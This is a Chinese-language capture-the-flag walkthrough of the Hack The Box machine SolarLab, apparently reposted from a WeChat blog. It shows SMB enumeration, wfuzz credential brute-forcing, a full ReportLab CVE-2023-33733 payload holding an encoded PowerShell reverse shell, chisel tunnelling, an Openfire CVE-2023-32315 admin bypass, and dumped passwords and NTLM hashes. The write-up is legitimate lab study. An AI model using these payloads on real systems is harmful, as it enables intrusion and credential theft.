扫描靶机
nmap -p 1-65535 -T4 -A -v 10.10.11.16
有80端口跟smb日常端口,先试试空密码登录
看来可以空密码登录,有两个共享文件夹,使用smbmap看看属性
得出了Documents跟IPC$有只读属性,先看Documents
smbclient \\10.10.11.16\Documents -N
底下有几个文件夹还有word文档execl表格,下载下来吧,然后打开
从里面的信息可以得到,用户名还有密码,将这些用户名收集起来,按照以前的惯例格式
Alexander.knightAlexander.kKAlexanderblake.byteblake.bAlexanderKClaudiaSblakeb
收集完看下网页
80网站没什么东西可以看,然后看看6791端口
需要登录,但是没有用户跟密码,那就用上面收集到的,进行fuzz
wfuzz -c -z file,users.txt -z file,pass.txt --hw 0 -d "username=FUZZ&password=FUZ2Z" -H "Content-Type: application/x-www-form-urlencoded" -u http://report.solarlab.htb:6791/login
跑出来了一个302状态的,是blakeb - ThisCanB3typedeasily1@,直接登录试试
成功登录了,有四个选项,里面的每一个都有自己的特点
第三个跟第四个其中里面的表单是可以放大缩小的,猜测可以进行测试,在网上可以找到Reportlab的一个漏洞,就是利用html解析功能,利用系统的python库,可以参考这篇文章
https://ethicalhacking.uk/cve-2023-33733-rce-in-reportlabs-html-parser/#gsc.tab=0
首先是创建一个evil的html,里面加入payload,将html的代码复制到表单里面,生成的时候会利用改系统python库进行生成,从而执行payload,改evil html就在网站的下方
<para><font color="[ [ getattr(pow,Attacker('__globals__'))['os'].system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgAwACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=') for Attacker in [orgTypeFun('Attacker', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))]] and 'red'">exploit</font></para>
但是会限制字数,所以需要使用burpsuite进行抓包,将其补全
本地进行监听,成功的反弹shell
成功的拿到了user flag
搜一下目录的文件夹,可以得到一个db文件
将其下载下来打开看看
BlakeB BlakeBClaudiaS ClaudiaSAlexanderK ClaudiaSblakeb ThisCanB3typedeasily1@claudias 007poiuytrewqalexanderk HotP!fireguard
得到了一份用户名跟表格,先留着,查看一下后台端口
看到了有9090跟9091端口,将其代理到本地使用chisel
.chisel-1-7-6.exe client 10.10.14.13:1132 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091
成功代理出来,打开浏览器进入9090端口
这是openfire的cms,下面就是版本号4.7.4,在网上可以找到关于这个版本的exploit
https://www.vicarius.io/vsociety/posts/cve-2023-32315-path-traversal-in-openfire-leads-to-rce
https://github.com/miko550/CVE-2023-32315
这是身份绕过exp,里面包含命令运行模块,但是这个需要将模块上传到cms里面,前提是新建一个管理员账号
新建成功后直接登录
成功的登录进去了,然后进入到插件选项,将evil的jar包上传
上传成功后根据GitHub那个给的提示,进入到所需目录
这时候输入刚刚jar包的密码123
然后选择system command
成功拿到openfire用户,接下来搜索一下目录,在openfire系统的源文件目录C:Program FilesOpenfireembedded-db里面可以找到openfire,script,将其下载下来
这是openfire的数据库脚本命令,这脚本专为 HSQLDB 数据库编写
在这里可以找到admin的哈希,但是需要破解
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','[email protected]','001700223740785','0')这是需要这个openfire的解密工具
https://github.com/c0rdis/openfire_decrypt
java OpenFireDecryptPass.java becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
成功的拿到了密码,直接使用RunCs工具进行登录(我用cs直接),成功拿到admin
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c032ae85d6995c0bb4999ec869d90cf:::blake:1000:aad3b435b51404eeaad3b435b51404ee:4cf570cdca082077b0e61addac8b7705:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::openfire:1001:aad3b435b51404eeaad3b435b51404ee:a22c1b83fa00c6030969caf37a5e061b:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:57da9863751e0fd175f042bc41aec9b2:::
原文始发于微信公众号(Jiyou too beautiful):HTB-SolarLab笔记
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论